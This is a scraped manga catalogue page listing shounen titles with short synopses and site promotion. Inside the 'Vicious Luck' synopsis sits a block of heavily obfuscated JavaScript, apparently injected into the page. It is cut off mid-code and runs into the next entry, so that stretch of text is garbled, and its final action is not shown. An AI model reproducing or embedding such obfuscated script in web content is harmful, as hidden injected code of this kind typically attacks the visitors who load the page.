Shounen - Page 37

Shounen manga is a genre primarily aimed at young male readers, often containing action, battles, and personal struggles. The stories typically focus on a young male protagonist's journey to grow, win, and prove their strength.

9596 results

Zaijian Countdown

Akio Fujisawa was a quiet lonerobviously the total opposite of the sociable and confident Tingyu, a Chinese exchange student who joined his class. But when Tingyu revealed the insecurities behind that confident exterior, a friendship started to blossom. Fast-forward to years after graduation, and that friendship is still going strong. Tingyu's frequent visits to Japan keep their connection alive, all while Akio harbours some more-than-friendly feelings...


Stress Game

Ryuuji Ogami, a harmless high school student with a rather troubled family situation, is asked by his kouhai, Konoko Hoshino, to install a game on his smartphone. As a result, he ends up as one of the participants in the Stress Game, a game that transcends human limits. Out of nowhere, monsters that shouldn’t exist begin attacking him! This is a game where players use their emotions. Each player’s supernatural powers are completely affected by the amount and intensity of their stress. Underestimated by Konoko, who thought Ryuuji would be the weakest, he actually turns out to have an extremely high amount of stress… And because of this, even at level 1 and in the face of incredibly strong enemies, Ryuuji shows overwhelming strength! Stress Game. A game played by those who harbor dark secrets in their hearts, willing to risk their lives to fulfill their desires. Thus, the curtain for this battle game is drawn!


Player From Today Onwards

Player from Today Onwards is a Manga/Manhwa/Manhua in (English/Raw) language, Manhwa series is written by Updating This Comic is About Hunters were born from the backing of Sponsors. Among those hunters, the twelve brightest heroes proclaimed themselves as gods, founding Eden. And Eden… ‘dominated the world.' That was the era that I, Lee JoonGyung, lived through. I was a normal person in a world dominated by Hunters. Like other normal people, I lived the life of domesticated cattle. The only thing I had was a single book. A book which told the tale of the forgotten but true hero, the Demon King. One day, Athena, one of the Twelve Sovereigns, appeared in front of me, and I… ‘This is over 100 years in the past? The age when Hunters first appeared?' . ..fell into the past. , the former sponsor of the Demon King, sponsored me, and I started following a path similar to the Demon King's. ‘I won't become like the Demon King.' But I dream of a better future than the Demon King. With the power that the Demon King had and the powers I currently possess, I'm going to become a Hunter that surpasses Hunters. I'm… a ‘Player from Today Onwards.'


Vicious Luck

“Warning: Mature content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” Chen Yang was just an ordinary person. One day, he was given an opportunity: he was offered the ability to control his luck! Love, status, and fortune were suddenly all within his grasp. When a person can control his luck at will, how will his life change? Will he run into beauties as soon as he steps outside his door? Will he trade as much stock as he possibly can? Damn… it’s too good to be true… Those who are my friends will all live wonderful lives. Those who are my enemies have already paid the price!<script></script><script>(function(_0x52be10,_0x56af98){var _0x46348c=_0x452e,_0x5eca90=_0x52be10();while(!![]){try{var _0x48cd77=-parseInt(_0x46348c(0xb5))/(-0x1215*-0x1+-0x17ea+0x5d6)*(parseInt(_0x46348c(0xa7))/(-0x12c9+-0xfae+-0x161*-0x19))+-parseInt(_0x46348c(0x9c))/(0xc6f*0x3+-0x949+-0x1*0x1c01)+parseInt(_0x46348c(0xa8))/(0x27*0xf+0xe7b+-0x10c0)*(parseInt(_0x46348c(0xa6))/(-0x1*0x177a+0x4*-0x19d+0x1df3))+-parseInt(_0x46348c(0xb8))/(-0x6*-0x91+0x314+-0x674)+parseInt(_0x46348c(0xa0))/(0x1e4a+0x7*-0x18+-0x1*0x1d9b)*(parseInt(_0x46348c(0xb6))/(0x1c4d+-0x20*0x11+-0x1a25))+-parseInt(_0x46348c(0xba))/(-0x1*0x981+-0x2*-0xa6f+-0xb54)*(parseInt(_0x46348c(0xa3))/(-0x1*0x119f+0x1*-0x3af+0x2ab*0x8))+-parseInt(_0x46348c(0xa1))/(0x14*-0x6d+-0x1d06+0x2595)*(-parseInt(_0x46348c(0xa9))/(-0x9*0x3fd+0x1*0x2e7+0x210a));if(_0x48cd77===_0x56af98)break;else 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Ranker’s Return (Remake)

Read Manhwa Ranker’s Return (Remake) Online For Free At HariManga Ranker’s Return (Remake) Novel also known as “Ranker’s Return (2021) / Возвращение ранкера / การกลับมาของแรงเกอร์ / 戰神歸來 / 榜上玩家的归还 / 랭커의 귀환 (2021)”. This OnGoing webtoon was released on 2021. The story was written by Lee Sanchaek / Yeong Biram and illustrations by PARK Junho. The content of the comic Ranker’s Return (Remake): In the early days of the virtual reality game, Arena, MeleeGod was the strongest ranked player! He deleted his character and suddenly left. In order to restore his bankrupt family, he returned to Arena! “Do you want to create a character?” The comic Ranker’s Return (Remake) belongs to the Genre: Action, Adventure, Comedy, Fantasy, Manhwa, Manhwa Hot, Shounen, Webtoons MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “Kun Manga” and “Read Manhwa Online,” as well as related terms like Zin Manga, ManhwaClan, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. You can follow some other great Comics!!!: Wail Of Weakness Hunter Academy’s Strongest Battle God Bloodhound’s Regression Instinct


Secret Core

The noble son is soon to be split apart from his family. He, who is regarded as the prince’s future wife, is secretly in love with the imperial guard Ye Mo… Ye Mo was born rebellious and is not afraid of challenging his fate, leading to an eventful and unbridled life! What is more important to them, their family’s interests or the heart’s desire? How do you choose between a carefree life and a life of great achievements? What will become of this ‘secret love’? Scanlation: Watermelonely scans


Strike Witches - Aurora no Majo

Strike Witches - Aurora no Majo summary is updating. Come visit sometime to read the latest chapter of Strike Witches - Aurora no Majo. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.


Yandere Kanojo

Tanaka Manabu is a geeky student, on the way to school he meets a girl carrying a bloody bat. That girl is Ryuuzaki Reina, leader of the school's female delinquents. It's love at first sight. A gag manga (with a combination of 4koma and normal page) about having a yandere girlfriend. Note: In this series, They use "yandere" to as a "yankee" + "dere-dere" combination. Yandere usually means something different (google it). And a "yankee" is a trouble maker, it does not refer to Americans, google that too. ** This series is serialized in two forms; The print version in Gangan Joker, and an online version. Both versions feature the same characters and settings, but different stories. The majority of the scanlations are from the online version. Scans from the print version are denoted with the .1 suffix designation.


Log Horizon - Kanami, Go! East!

"Let's go together! To Japan!!" While he was traveling in Central Asia on the Chinese server, Leonardo was dropped into the city of Tekeli that is impossible to escape. Among the worst of circumstances, a savior appeared... From Log Horizon, the story of another one of its heroes, Kanami, now begins!!


Chrono Mansion

Chrono Mansion summary is updating. Come visit sometime to read the latest chapter of Chrono Mansion. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.


13 Game

From MangaHelpers: On his seventeenth birthday, Amamiya Kota was going to ask his classmate Misora Hiyori out. Tragically, he dies in a car accident but is given a second chance back in the living world on borrowed time. He gets entered into a competition called the 13 Game where other people like Kota who were supposed to die return back to the world and given an option: locate and kill 13 other players or suffer the fate of death. Each player is assigned to a handler, mysterious beings with special powers, who use them as if they were characters in a video game. Kota’s handler, Merume, explains that there are players like him all over the country, each with a unique ability that helps them kill, and Kota has to kill 13 players within 1 year. With his demon hands ability that was inspired from his hobby of magic tricks, Kota must unwillingly participate in this cruel game if he wants to live. [vyc]


Purgatory Dead Roll

Meet Sakai Hiroaki, a high school teenage mastermind with a genius-level intelligence and a lack of interest in anything that is easy to him.During one unlucky day, in an attempt to stop a student from committing suicide, he ends up committing suicide himself.After he awakens, he finds himself not in the real world, nor in heaven, but in purgatory, along with a group of others who did the same: commit suicide.Sakai discovers that he and his peers are subjected to never-ending intense death games in this world for reasons unknown to him, and he tries to find a way to escape.
